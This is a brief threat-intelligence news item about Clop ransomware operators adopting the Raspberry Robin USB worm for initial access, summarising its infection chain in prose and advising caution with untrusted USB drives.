Threat Watch

Raspberry Robin Operators Selling Access To Companies

According to researchers at Microsoft, they have seen an uptick in Clop ransomware infections. The group has made a tactic switch and begun using Raspberry Robin as their main form of Infection, whereas previously, the group relied on phishing campaigns to steal credentials and gain access into organizations. Raspberry Robin is a Windows worm and propagated through removable USB drives. The malicious code uses Windows Installer to reach out to QNAP-associated domains and download a malicious DLL. The malware uses TOR exit nodes as a backup C2 infrastructure. The malware uses cmd.exe to read and execute a file stored on the infected external drive, it leverages msiexec.exe for external network communication to a rogue domain used as C2 to download and install a DLL library file. Then msiexec.exe launches a legitimate Windows utility, fodhelper.exe, which will run rundll32.exe to execute a malicious command. Researchers pointed out that processes launched by fodhelper.exe run with administrative privileges and require no user account commands.


This switch in tactics by the Clop threat group is not uncommon amongst these groups. Rapidly changing tactics and leveraging dark web Malware-as-a-Service (MaaS) offerings allows threat groups to infect companies at a faster rate since they do not have to wait on a successful phishing campaign. Illicit access is frequently brokered in the underground economy. To mitigate the risks of attacks similar to Raspberry Robin, a good rule amongst organizations is to never use USB drives that are not trusted – particularly those that are unknown. If a USB drive is found randomly on the ground, it should be turned into the security team for evaluation.

Raspberry Robin operators are selling initial access to compromised enterprise networks to ransomware gangs